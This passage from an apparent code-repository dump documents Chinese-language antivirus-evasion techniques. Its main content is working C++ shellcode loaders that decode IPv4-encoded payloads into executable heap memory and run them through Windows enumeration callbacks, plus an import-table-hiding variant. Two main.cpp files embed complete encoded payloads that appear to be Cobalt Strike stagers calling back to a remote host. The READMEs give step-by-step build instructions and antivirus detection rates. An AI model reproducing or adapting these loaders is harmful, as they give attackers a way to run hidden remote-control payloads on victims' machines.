0.2 | base64+uuid转化(UuidFromStringA) | 2/68 | 2022-02-18 | √ | √ | √ | c++ | 17 | | 0.3 | ipv6转化(RtlIpv6StringToAddressA) | 2/68 | 2022-02-21 | √ | √ | √ | c++ | 18 | | 0.4 | mac转化(RtlEthernetStringToAddressA) | 3/67 | 2022-02-21 | √ | √ | √ | c++ | 19 | | 0.5 | ipv4转化(RtlIpv4StringToAddressA) | 2/66 | 2022-03-07 | √ | √ | √ | c++ | 20 | 21 | 22 | 23 | ## 上手指南 24 | 25 | 使用Cobalt Strike生成X64位的shellcode 26 | 27 | ![image-20220218181020741](../images/image-callback-1.png) 28 | 29 | ### 版本0.1 30 | 31 | 将shellcode替换至./v0.1/trans.py中的buf变量,并执行该脚本。(shellcode -> uuid) 32 | 33 | ```bash 34 | python3 ./v0.1/trans.py 35 | ``` 36 | 37 | ![image-20220218192747863](../images/image-callback-2.png) 38 | 39 | 将转换好的uuid,替换至./v0.1/main.cpp中的uuids字符串数组中 40 | 41 | 编译运行即可。 42 | 43 | 44 | 45 | ### 版本0.2 46 | 47 | 将shellcode替换至./v0.2/trans.py中的buf变量,并执行该脚本。(shellcode -> uuid -> base64) 48 | 49 | ```bash 50 | python3 ./v0.2/trans.py 51 | ``` 52 | 53 | ![image-20220218193413454](../images/image-callback-3.png) 54 | 55 | 将转换好的base64,替换至./v0.2/main.cpp中的uuids_base64数组中 56 | 57 | 编译运行即可。 58 | 59 | 60 | 61 | ### 版本0.3 62 | 63 | 先将shellcode转化为ipv6格式,客户端读取ipv6之后调用RtlIpv6StringToAddressA恢复成shellcode再通过回调函数加载至内存 64 | 65 | 将shellcode替换至./v0.3/trans.py中的buf变量,并执行该脚本。(shellcode -> ipv6) 66 | 67 | ```python 68 | python3 ./v0.3/trans.py 69 | ``` 70 | 71 | ![111](../images/image-callback-5.png) 72 | 73 | 将转换好的ipv6,替换至./v0.3/main.cpp中的ipv6数组中 74 | 75 | 编译运行即可。 76 | 77 | 78 | 79 | ### 版本0.4 80 | 81 | 将shellcode替换至./v0.4/trans.py中的buf变量,并执行该脚本。(shellcode -> mac) 82 | 83 | ```python 84 | python3 ./v0.4/trans.py 85 | ``` 86 | 87 | 将转换好的mac,替换至./v0.4/main.cpp中的mac_数组中 88 | 89 | 编译运行即可。 90 | 91 | 92 | 93 | ### 版本0.5 94 | 95 | 将shellcode替换至./v0.5/trans.py中的buf变量,并执行该脚本。(shellcode -> ipv4) 96 | 97 | ```python 98 | python3 ./v0.5/trans.py 99 | ``` 100 | 101 | 将转换好的ipv4,替换至./v0.5/main.cpp中的ipv4数组中 102 | 103 | 编译运行即可。 104 | 105 | 106 | 107 | 108 | 109 | ## 解决出现黑框情况 110 | 111 | [VS中运行去除黑框](https://github.com/midisec/BypassAnti-Virus/blob/main/common/VS%E4%B8%AD%E8%BF%90%E8%A1%8C%E5%8E%BB%E9%99%A4%E9%BB%91%E6%A1%86.md) 112 | 113 | 114 | 115 | ## 原理分析 116 | 117 | 什么是UUID? 通用唯一标识符 ( Universally Unique Identifier ), 我们可以利用该机制将shellcode转化成uuid,并在运行程序时,将uuid重新转化成shellcode,加载至内存。 118 | 119 | 什么是回调函数? 回调函数(callback)是一个通过函数指针来调用的函数。 120 | 121 | 如何利用回调函数? 在windows系统中,有许多库函数需要传递一个回调函数,因此我们可以通过该机制,将恶意的shellcode加载至内存。 122 | 123 | ![cucv50oqin](../images/image-callback-4.png) 124 | 125 | WINDOWS库中,可利用的回调函数,经过测试,以下均可以成功执行回调函数加载shellcode。 126 | 127 | ### 可利用的回调函数 128 | 129 | ```c++ 130 | EnumSystemLocalesA((LOCALE_ENUMPROCA)ha, 0); 131 | EnumTimeFormatsA((TIMEFMT_ENUMPROCA)ha, 0, 0); 132 | EnumWindows((WNDENUMPROC)ha, 0); 133 | EnumDesktopWindows(NULL,(WNDENUMPROC)ha, 0); 134 | EnumThreadWindows(0, (WNDENUMPROC)ha, 0); 135 | EnumSystemGeoID(0, 0, (GEO_ENUMPROC)ha); 136 | EnumSystemLanguageGroupsA((LANGUAGEGROUP_ENUMPROCA)ha, 0, 0); 137 | EnumUILanguagesA((UILANGUAGE_ENUMPROCA)ha, 0, 0); 138 | EnumSystemCodePagesA((CODEPAGE_ENUMPROCA)ha, 0); 139 | EnumDesktopsW(NULL,(DESKTOPENUMPROCW)ha, NULL); 140 | EnumSystemCodePagesW((CODEPAGE_ENUMPROCW)ha, 0); 141 | EnumDateFormatsA((DATEFMT_ENUMPROCA)ha, 0, 0); 142 | EnumChildWindows(NULL, (WNDENUMPROC)ha, 0); 143 | 144 | EnumTimeFormatsW((TIMEFMT_ENUMPROCW)ha, NULL, NULL); 145 | EnumUILanguagesW((UILANGUAGE_ENUMPROCW)ha, NULL, NULL); 146 | EnumTimeFormatsEx((TIMEFMT_ENUMPROCEX)ha, NULL, NULL, NULL); 147 | EnumSystemLocalesW((LOCALE_ENUMPROCW)ha, NULL); 148 | EnumSystemLocalesEx((LOCALE_ENUMPROCEX)ha, NULL, NULL, NULL); 149 | EnumSystemLanguageGroupsW((LANGUAGEGROUP_ENUMPROCW)ha, NULL, NULL); 150 | EnumSystemGeoNames(NULL, (GEO_ENUMNAMEPROC)ha, NULL); 151 | EnumLanguageGroupLocalesW((LANGGROUPLOCALE_ENUMPROCW)ha, LGRPID_ARABIC, 0, NULL); 152 | EnumLanguageGroupLocalesA((LANGGROUPLOCALE_ENUMPROCA)ha, LGRPID_ARABIC, 0, NULL); 153 | EnumDateFormatsW((DATEFMT_ENUMPROCW)ha, NULL, NULL); 154 | EnumDateFormatsExW((DATEFMT_ENUMPROCEXW)ha, NULL, NULL); 155 | EnumDateFormatsExEx((DATEFMT_ENUMPROCEXEX)ha, NULL, NULL, NULL); 156 | EnumDateFormatsExA((DATEFMT_ENUMPROCEXA)ha, NULL, NULL); 157 | ``` 158 | 159 | 160 | 161 | IPV6同uuid的原理,先将恶意payload转化成ipv6格式,再通过windows系统库函数去解析成shellcode,再去加载至内存,达到免杀效果。 162 | 163 | 164 | 165 | 166 | 167 | ## 参考 168 | 169 | https://my.oschina.net/u/4079523/blog/5011399 170 | 171 | https://cloud.tencent.com/developer/article/1819583 172 | 173 | https://mp.weixin.qq.com/s/3Hit7a3hQ97XDHaMSZQ8cQ 174 | 175 | https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-enumthreadwindows 176 | -------------------------------------------------------------------------------- /callback/v0.5/main.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #pragma comment(lib, "Ntdll.lib") 5 | 6 | 7 | // shellcode -> ipv4 8 | const char* ipv4[] = 9 | { 10 | "252.72.131.228", "240.232.200.0", "0.0.65.81", "65.80.82.81", "86.72.49.210", "101.72.139.82", "96.72.139.82", "24.72.139.82", "32.72.139.114", "80.72.15.183", "74.74.77.49", "201.72.49.192", "172.60.97.124", "2.44.32.65", "193.201.13.65", "1.193.226.237", "82.65.81.72", "139.82.32.139", "66.60.72.1", "208.102.129.120", "24.11.2.117", "114.139.128.136", "0.0.0.72", "133.192.116.103", "72.1.208.80", "139.72.24.68", "139.64.32.73", "1.208.227.86", "72.255.201.65", "139.52.136.72", "1.214.77.49", "201.72.49.192", "172.65.193.201", "13.65.1.193", "56.224.117.241", "76.3.76.36", "8.69.57.209", "117.216.88.68", "139.64.36.73", "1.208.102.65", "139.12.72.68", "139.64.28.73", "1.208.65.139", "4.136.72.1", "208.65.88.65", "88.94.89.90", "65.88.65.89", "65.90.72.131", "236.32.65.82", "255.224.88.65", "89.90.72.139", "18.233.79.255", "255.255.93.106", "0.73.190.119", "105.110.105.110", "101.116.0.65", "86.73.137.230", "76.137.241.65", "186.76.119.38", "7.255.213.72", "49.201.72.49", "210.77.49.192", "77.49.201.65", "80.65.80.65", "186.58.86.121", "167.255.213.233", "147.0.0.0", "90.72.137.193", "65.184.187.1", "0.0.77.49", "201.65.81.65", "81.106.3.65", "81.65.186.87", "137.159.198.255", "213.235.121.91", "72.137.193.72", "49.210.73.137", "216.77.49.201", "82.104.0.50", "192.132.82.82", "65.186.235.85", "46.59.255.213", "72.137.198.72", "131.195.80.106", "10.95.72.137", "241.186.31.0", "0.0.106.0", "104.128.51.0", "0.73.137.224", "65.185.4.0", "0.0.65.186", "117.70.158.134", "255.213.72.137", "241.72.137.218", "73.199.192.255", "255.255.255.77", "49.201.82.82", "65.186.45.6", "24.123.255.213", "133.192.15.133", "157.1.0.0", "72.255.207.15", "132.140.1.0", "0.235.179.233", "228.1.0.0", "232.130.255.255", "255.47.108.122", "54.65.0.247", "96.89.109.156", "120.7.20.127", "144.60.181.242", "209.153.157.145", "194.102.196.110", "23.63.184.67", "179.238.69.40", "239.143.206.123", "91.6.145.44", "46.164.42.231", "104.222.185.242", "130.222.174.158", "145.231.245.48", "56.159.107.228", "64.90.7.188", "207.21.145.153", "224.95.148.62", "0.165.15.253", "0.85.115.101", "114.45.65.103", "101.110.116.58", "32.77.111.122", "105.108.108.97", "47.53.46.48", "32.40.99.111", "109.112.97.116", "105.98.108.101", "59.32.77.83", "73.69.32.49", "48.46.48.59", "32.87.105.110", "100.111.119.115", "32.78.84.32", "54.46.50.59", "32.87.105.110", "54.52.59.32", "120.54.52.59", "32.84.114.105", "100.101.110.116", "47.54.46.48", "59.32.77.65", "65.82.74.83", "41.13.10.0", "113.228.251.196", "58.198.106.53", "14.148.214.212", "54.120.247.73", "157.85.38.149", "172.70.251.5", "106.246.88.92", "159.49.139.238", "67.46.249.240", "140.106.72.106", "240.232.137.136", "21.50.23.107", "229.88.1.183", "108.176.150.196", "127.73.81.52", "40.94.185.152", "124.77.186.28", "226.53.69.37", "113.218.75.31", "127.103.183.125", "158.176.168.127", "11.237.138.92", "18.169.98.90", "9.129.183.185", "16.179.139.221", "152.233.111.98", "30.169.137.47", "250.159.38.102", "22.177.59.208", "176.195.50.177", "224.13.249.163", "65.0.35.208", "113.113.192.26", "115.241.64.4", "59.174.87.22", "124.66.12.72", "49.151.96.122", "172.96.197.199", "133.98.186.188", "239.254.98.164", "125.14.121.117", "75.71.184.109", "66.72.223.74", "51.100.208.134", "59.41.177.155", "222.220.154.182", "204.28.54.222", "81.12.79.164", "131.133.133.175", "125.35.28.86", "219.134.190.145", "0.65.190.240", "181.162.86.255", "213.72.49.201", "186.0.0.64", "0.65.184.0", "16.0.0.65", "185.64.0.0", "0.65.186.88", "164.83.229.255", "213.72.147.83", "83.72.137.231", "72.137.241.72", "137.218.65.184", "0.32.0.0", "73.137.249.65", "186.18.150.137", "226.255.213.72", "131.196.32.133", "192.116.182.102", "139.7.72.1", "195.133.192.117", "215.88.88.88", "72.5.0.0", "0.0.80.195", "232.127.253.255", "255.49.46.49", "53.46.56.48", "46.49.48.50", "0.73.150.2", "210.0.0.0" 11 | }; 12 | 13 | 14 | int main() 15 | { 16 | HANDLE hc = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0); 17 | void* ha = HeapAlloc(hc, 0, 0x100000); 18 | DWORD_PTR hptr = (DWORD_PTR)ha; 19 | int elems = sizeof(ipv4) / sizeof(ipv4[0]); 20 | PCSTR Terminator = ""; 21 | 22 | for (int i = 0; i < elems; i++) { 23 | 24 | if (RtlIpv4StringToAddressA(ipv4[i], FALSE, &Terminator, (in_addr*)hptr) == STATUS_INVALID_PARAMETER) 25 | { 26 | printf("ERROR!"); 27 | return 0; 28 | } 29 | hptr += 4; 30 | } 31 | 32 | // EnumSystemLocalesA((LOCALE_ENUMPROCA)ha, 0); 33 | // EnumTimeFormatsA((TIMEFMT_ENUMPROCA)ha, 0, 0); 34 | // EnumWindows((WNDENUMPROC)ha, 0); 35 | // EnumDesktopWindows(NULL,(WNDENUMPROC)ha, 0); 36 | // EnumThreadWindows(0, (WNDENUMPROC)ha, 0); 37 | // EnumSystemGeoID(0, 0, (GEO_ENUMPROC)ha); 38 | // EnumSystemLanguageGroupsA((LANGUAGEGROUP_ENUMPROCA)ha, 0, 0); 39 | EnumUILanguagesA((UILANGUAGE_ENUMPROCA)ha, 0, 0); 40 | // EnumSystemCodePagesA((CODEPAGE_ENUMPROCA)ha, 0); 41 | // EnumDesktopsW(NULL,(DESKTOPENUMPROCW)ha, NULL); 42 | // EnumSystemCodePagesW((CODEPAGE_ENUMPROCW)ha, 0); 43 | // EnumDateFormatsA((DATEFMT_ENUMPROCA)ha, 0, 0); 44 | // EnumChildWindows(NULL, (WNDENUMPROC)ha, 0); 45 | // CloseHandle(ha); 46 | return 0; 47 | } 48 | 49 | 50 | 51 | -------------------------------------------------------------------------------- /hide_Import_tables/README.md: -------------------------------------------------------------------------------- 1 | # 免杀方式:隐藏导入表 2 | 3 | 4 | 5 | 在今年上半年,我们介绍通过[其他形式shellcode的转换+系统回调函数的方式](https://github.com/midisec/BypassAnti-Virus/tree/main/callback)来加载shellcode绕过杀毒软件,随着时间的推移,部分系统回调函数和创建内存的函数已经被列入黑名单中。杀毒软件可以通过计算PE文件的导入表(import address tables)的哈希值来判断该程序是否调用这些敏感函数,进而判断是否为危险程序,本文将介绍通过函数指针的方式调用系统函数,从而隐藏程序导入表。 6 | 7 | 8 | 9 | ## 导入表的查询: 10 | 11 | ### 工具: 12 | 13 | VS2022自带的dumpbin.exe (Path: [vs2022]\VC\Tools\MSVC\14.31.31103\bin\Hostx64\x64\dumpbin.exe) 或 PE查看工具 14 | 15 | ### 使用指南: 16 | 17 | ```bash 18 | dumpbin.exe /imports Project3.exe 19 | ``` 20 | 21 | 22 | 23 | 例如我们查看[回调函数V0.2版本](https://github.com/midisec/BypassAnti-Virus/tree/main/callback/v0.2)中的导入表 24 | 25 | ![image1](../images/image-import-tables-1.png) 26 | 27 | 从中可以看出几个目前已经标记为敏感调用的函数, 28 | 29 | **01**: KERNEL32.dll下用来创建、分配内存的HeapCreate、HeapAlloc; 30 | 31 | **02**: USER32.dll下用来加载shellcode的回调函数EnumChildWindows; 32 | 33 | **03**: RPCTR4.dll下用来shellcode转换的UuidFromStringA。 34 | 35 | 为了避免杀毒软件直接通过PE文件中的导入表进行查杀,我们使用函数指针动态加载这些系统函数。 36 | 37 | 38 | 39 | ## 实现方法 40 | 41 | ### 相关函数 42 | 43 | #### Ⅰ. 获取/加载相关模块的句柄 44 | 45 | GetModuleHandle(TEXT("kernel32.dll")) : 获取kernel32模块,注意必须已由调用进程下模块加载(当前同一模块) 46 | 47 | LoadLibraryA("RPCRT4.dll") : 加载指定的RPCRT4模块,可以是其他模块 48 | 49 | > 其中从上图的导入表中可以看出,USER32.dll和RPCRT4.dll中只调用单个函数(说明进程在调用这些函数时是单独加载的模块),也就是这个模块是需要单独指定加载的,因此只能使用LoadLibraryA而不能使用GetModuleHandle。 50 | 51 | #### Ⅱ. 导出系统函数地址 52 | 53 | GetProcAddress(模块的句柄, 函数名) : 获取系统函数的地址,从而实现动态加载系统函数。 54 | 55 | #### Ⅲ. 定义函数指针执行函数 56 | 57 | 在VS2022中可以通过"Ctrl+左边"的方式查看原先系统函数的定义,例如HeapCreate函数的定义为 58 | 59 | ![image2](../images/image-import-tables-2.png) 60 | 61 | 因此我们可以直接复制并修改,定义一个函数指针ImportHeapCreate,其中的参数以及返回值可以参考上图。 62 | 63 | ```c++ 64 | typedef HANDLE(WINAPI* ImportHeapCreate)( 65 | _In_ DWORD flOptions, 66 | _In_ SIZE_T dwInitialSize, 67 | _In_ SIZE_T dwMaximumSize 68 | ); 69 | ``` 70 | 71 | #### Ⅳ. 通过 Ⅰ和Ⅱ方法组合,动态获取系统函数地址+定义函数指针从而进行函数执行 72 | 73 | 以 HeapCreate、HeapAlloc、UuidFromStringA这三个函数为例 74 | 75 | ```c++ 76 | // 1. 先根据③中的方法,定义函数指针 77 | typedef HANDLE(WINAPI* ImportHeapCreate)( 78 | _In_ DWORD flOptions, 79 | _In_ SIZE_T dwInitialSize, 80 | _In_ SIZE_T dwMaximumSize 81 | ); 82 | 83 | typedef LPVOID(WINAPI* ImportHeapAlloc)( 84 | _In_ HANDLE hHeap, 85 | _In_ DWORD dwFlags, 86 | _In_ SIZE_T dwBytes 87 | ); 88 | 89 | typedef RPC_STATUS(RPC_ENTRY* ImportUuidFromStringA)( 90 | _In_opt_ RPC_CSTR StringUuid, 91 | _Out_ UUID __RPC_FAR* Uuid 92 | ); 93 | 94 | // 2. 通过获取模块句柄(GetModuleHandle、LoadLibraryA),再通过GetProcAddress导出函数地址 95 | 96 | int main() 97 | { 98 | // 通过GetModuleHandle+GetProcAddress的方式 99 | ImportHeapCreate MyHeapCreate = (ImportHeapCreate)GetProcAddress(GetModuleHandle(TEXT("kernel32.dll")), "HeapCreate"); 100 | ImportHeapAlloc MyHeapAlloc = (ImportHeapAlloc)GetProcAddress(GetModuleHandle(TEXT("kernel32.dll")), "HeapAlloc"); 101 | 102 | // 通过LoadLibraryA+GetProcAddress的方式 103 | HMODULE hModule = LoadLibraryA("RPCRT4.dll"); 104 | ImportUuidFromStringA MyUuidFromStringA = (ImportUuidFromStringA)GetProcAddress(hModule, "UuidFromStringA"); 105 | 106 | // ... 107 | // ... 108 | 109 | return 0; 110 | } 111 | 112 | ``` 113 | 114 | 这样一来,我们就将 HeapCreate、HeapAlloc、UuidFromStringA这三个系统函数通过地址并利用函数指针动态调用,并取名为MyHeapCreate、MyHeapAlloc、MyUuidFromStringA。在完整的代码编译后,我们再查询下导入表。(此时在导入表中已经隐藏了HeapCreate、HeapAlloc、UuidFromStringA) 115 | 116 | ![image3](../images/image-import-tables-3.png) 117 | 118 | 119 | 120 | 与此同时,由于时间的推移,我们将之前回调函数中的所有版本进行隐藏导入表的操作,并通过VT查杀的结果,实验对比出具体存在敏感的函数。 121 | 122 | ## 目录 123 | 124 | | 版本号 | 写入内存方式 | VT查杀率 | 时间 | 火绒 | 360 | 腾讯 | 代码 | 125 | | ------ | ----------------------------------------------- | -------- | ---------- | ---- | ---- | ---- | ---- | 126 | | 0.1 | uuid转化(UuidFromStringA)+隐藏导入表 | 7/68 | 2022-07-10 | √ | √ | √ | c++ | 127 | | 0.2 | base64+uuid转化(UuidFromStringA)+隐藏导入表 | 3/68 | 2022-07-10 | √ | √ | √ | c++ | 128 | | 0.3 | ipv6转化(RtlIpv6StringToAddressA)+隐藏导入表 | 6/68 | 2022-07-10 | √ | √ | √ | c++ | 129 | | 0.4 | mac转化(RtlEthernetStringToAddressA)+隐藏导入表 | 7/68 | 2022-07-10 | √ | √ | √ | c++ | 130 | | 0.5 | ipv4转化(RtlIpv4StringToAddressA)+隐藏导入表 | 17/68 | 2022-07-10 | √ | X | √ | c++ | 131 | 132 | 133 | 134 | ## 上手指南 135 | 136 | 各个版本的[使用方法](https://github.com/midisec/BypassAnti-Virus/tree/main/callback#%E4%B8%8A%E6%89%8B%E6%8C%87%E5%8D%97)如同以往一致。 137 | 138 | 139 | 140 | ## VT查杀实验对比结果 141 | 142 | ① HeapCreate、HeapAlloc与部分回调函数组合使用时,会被静态查杀到,可以通过隐藏导入表的方式绕过。 143 | 144 | ② 其中shellcode转换为IPV4(版本0.5),其ipv4数组的**前几个ip地址特征明显**且已经被大多数杀毒软件标记,所以该方法查杀率较高,可以通过**分离shellcode(**分离ipv4数组)的方式或其他编码的形式绕过检测。 145 | 146 | ③ 大部分回调函数没有被标记为敏感函数。 147 | 148 | 149 | 150 | 此外,隐藏导入表是一个综合的方法,可以使用在任何你想调用的系统函数当中,以函数指针执行动态获取地址的方式达到隐藏。 151 | 152 | 153 | 154 | ## 解决出现黑框情况 155 | 156 | [VS中运行去除黑框](https://github.com/midisec/BypassAnti-Virus/blob/main/common/VS%E4%B8%AD%E8%BF%90%E8%A1%8C%E5%8E%BB%E9%99%A4%E9%BB%91%E6%A1%86.md) 157 | 158 | 159 | 160 | ## 参考 161 | 162 | [https://idiotc4t.com/defense-evasion/avtive-call-api](https://idiotc4t.com/defense-evasion/avtive-call-api) 163 | 164 | [https://luckyfuture.top/BypassAVLearning4](https://luckyfuture.top/BypassAVLearning4) 165 | 166 | [https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-getmodulehandlea](https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-getmodulehandlea) 167 | 168 | [https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya](https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya) -------------------------------------------------------------------------------- /hide_Import_tables/v0.5/main.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #pragma comment(lib, "Ntdll.lib") 5 | 6 | 7 | // shellcode -> ipv4 8 | const char* ipv4[] = 9 | { 10 | "252.72.131.228", "240.232.200.0", "0.0.65.81", "65.80.82.81", "86.72.49.210", "101.72.139.82", "96.72.139.82", "24.72.139.82", "32.72.139.114", "80.72.15.183", "74.74.77.49", "201.72.49.192", "172.60.97.124", "2.44.32.65", "193.201.13.65", "1.193.226.237", "82.65.81.72", "139.82.32.139", "66.60.72.1", "208.102.129.120", "24.11.2.117", "114.139.128.136", "0.0.0.72", "133.192.116.103", "72.1.208.80", "139.72.24.68", "139.64.32.73", "1.208.227.86", "72.255.201.65", "139.52.136.72", "1.214.77.49", "201.72.49.192", "172.65.193.201", "13.65.1.193", "56.224.117.241", "76.3.76.36", "8.69.57.209", "117.216.88.68", "139.64.36.73", "1.208.102.65", "139.12.72.68", "139.64.28.73", "1.208.65.139", "4.136.72.1", "208.65.88.65", "88.94.89.90", "65.88.65.89", "65.90.72.131", "236.32.65.82", "255.224.88.65", "89.90.72.139", "18.233.79.255", "255.255.93.106", "0.73.190.119", "105.110.105.110", "101.116.0.65", "86.73.137.230", "76.137.241.65", "186.76.119.38", "7.255.213.72", "49.201.72.49", "210.77.49.192", "77.49.201.65", "80.65.80.65", "186.58.86.121", "167.255.213.233", "147.0.0.0", "90.72.137.193", "65.184.187.1", "0.0.77.49", "201.65.81.65", "81.106.3.65", "81.65.186.87", "137.159.198.255", "213.235.121.91", "72.137.193.72", "49.210.73.137", "216.77.49.201", "82.104.0.50", "192.132.82.82", "65.186.235.85", "46.59.255.213", "72.137.198.72", "131.195.80.106", "10.95.72.137", "241.186.31.0", "0.0.106.0", "104.128.51.0", "0.73.137.224", "65.185.4.0", "0.0.65.186", "117.70.158.134", "255.213.72.137", "241.72.137.218", "73.199.192.255", "255.255.255.77", "49.201.82.82", "65.186.45.6", "24.123.255.213", "133.192.15.133", "157.1.0.0", "72.255.207.15", "132.140.1.0", "0.235.179.233", "228.1.0.0", "232.130.255.255", "255.47.76.112", "88.73.0.223", "230.85.11.199", "11.25.77.180", "116.143.6.137", "138.98.23.143", "194.138.200.33", "160.27.46.63", "249.207.75.50", "114.226.233.116", "45.108.50.245", "210.14.202.177", "138.10.198.242", "248.236.224.92", "128.94.134.98", "36.141.10.16", "81.214.218.175", "132.206.138.138", "167.250.120.24", "151.188.176.80", "0.85.115.101", "114.45.65.103", "101.110.116.58", "32.77.111.122", "105.108.108.97", "47.53.46.48", "32.40.99.111", "109.112.97.116", "105.98.108.101", "59.32.77.83", "73.69.32.49", "48.46.48.59", "32.87.105.110", "100.111.119.115", "32.78.84.32", "54.46.50.59", "32.87.79.87", "54.52.59.32", "84.114.105.100", "101.110.116.47", "54.46.48.59", "32.77.65.71", "87.74.83.41", "13.10.0.206", "117.141.251.125", "219.214.5.27", "203.197.69.250", "126.33.95.229", "195.11.136.243", "34.244.43.247", "85.250.92.110", "189.222.49.153", "187.239.26.30", "238.185.58.177", "86.188.177.70", "86.128.179.241", "123.136.147.162", "118.122.89.149", "74.103.6.45", "203.54.178.81", "133.131.184.252", "89.87.232.91", "33.87.162.31", "192.95.3.16", "225.133.4.176", "96.230.231.167", "152.82.50.64", "68.71.219.97", "183.17.66.90", "242.32.6.183", "198.154.38.237", "94.154.253.135", "158.115.102.169", "233.245.149.199", "116.99.77.45", "171.19.0.245", "230.128.0.244", "105.200.85.222", "230.157.119.44", "183.28.175.34", "233.167.252.28", "55.231.233.214", "209.142.254.48", "174.33.159.221", "233.220.98.188", "253.242.104.147", "238.97.76.225", "57.14.12.198", "55.163.227.164", "39.177.114.236", "176.243.251.156", "121.121.245.96", "119.115.205.197", "115.97.1.9", "181.195.117.112", "169.177.78.162", "0.65.190.240", "181.162.86.255", "213.72.49.201", "186.0.0.64", "0.65.184.0", "16.0.0.65", "185.64.0.0", "0.65.186.88", "164.83.229.255", "213.72.147.83", "83.72.137.231", "72.137.241.72", "137.218.65.184", "0.32.0.0", "73.137.249.65", "186.18.150.137", "226.255.213.72", "131.196.32.133", "192.116.182.102", "139.7.72.1", "195.133.192.117", "215.88.88.88", "72.5.0.0", "0.0.80.195", "232.127.253.255", "255.49.46.49", "53.46.56.48", "46.49.48.50", "0.73.150.2", "210.0.0.0" 11 | 12 | }; 13 | 14 | typedef HANDLE(WINAPI* ImportHeapCreate)( 15 | _In_ DWORD flOptions, 16 | _In_ SIZE_T dwInitialSize, 17 | _In_ SIZE_T dwMaximumSize 18 | ); 19 | 20 | typedef LPVOID(WINAPI* ImportHeapAlloc)( 21 | _In_ HANDLE hHeap, 22 | _In_ DWORD dwFlags, 23 | _In_ SIZE_T dwBytes 24 | ); 25 | 26 | typedef NTSTATUS(NTAPI* ImportRtlIpv4StringToAddressA)( 27 | _In_ PCSTR S, 28 | _In_ BOOLEAN Strict, 29 | _Out_ PCSTR* Terminator, 30 | _Out_ struct in_addr* Addr 31 | ); 32 | 33 | typedef BOOL(WINAPI* ImportEnumUILanguagesA)( 34 | _In_ UILANGUAGE_ENUMPROCA lpUILanguageEnumProc, 35 | _In_ DWORD dwFlags, 36 | _In_ LONG_PTR lParam 37 | ); 38 | 39 | 40 | int main() 41 | { 42 | ImportHeapCreate MyHeapCreate = (ImportHeapCreate)GetProcAddress(GetModuleHandle(TEXT("kernel32.dll")), "HeapCreate"); 43 | ImportHeapAlloc MyHeapAlloc = (ImportHeapAlloc)GetProcAddress(GetModuleHandle(TEXT("kernel32.dll")), "HeapAlloc"); 44 | ImportEnumUILanguagesA MyEnumUILanguagesA = (ImportEnumUILanguagesA)GetProcAddress(GetModuleHandle(TEXT("kernel32.dll")), "EnumUILanguagesA"); 45 | 46 | HMODULE hModule = LoadLibraryA("ntdll.dll"); 47 | ImportRtlIpv4StringToAddressA MyRtlIpv4StringToAddressA = (ImportRtlIpv4StringToAddressA)GetProcAddress(hModule, "RtlIpv4StringToAddressA"); 48 | 49 | 50 | HANDLE hc = MyHeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0); 51 | void* ha = MyHeapAlloc(hc, 0, 0x100000); 52 | DWORD_PTR hptr = (DWORD_PTR)ha; 53 | int elems = sizeof(ipv4) / sizeof(ipv4[0]); 54 | PCSTR Terminator = ""; 55 | 56 | for (int i = 0; i < elems; i++) { 57 | 58 | if (MyRtlIpv4StringToAddressA(ipv4[i], FALSE, &Terminator, (in_addr*)hptr) == STATUS_INVALID_PARAMETER) 59 | { 60 | printf("ERROR!"); 61 | return 0; 62 | } 63 | hptr += 4; 64 | } 65 | 66 | 67 | MyEnumUILanguagesA((UILANGUAGE_ENUMPROCA)ha, 0, 0); 68 | CloseHandle(ha); 69 | return 0; 70 | } 71 | 72 | 73 | 74 | --------------------------------------------------------------------------------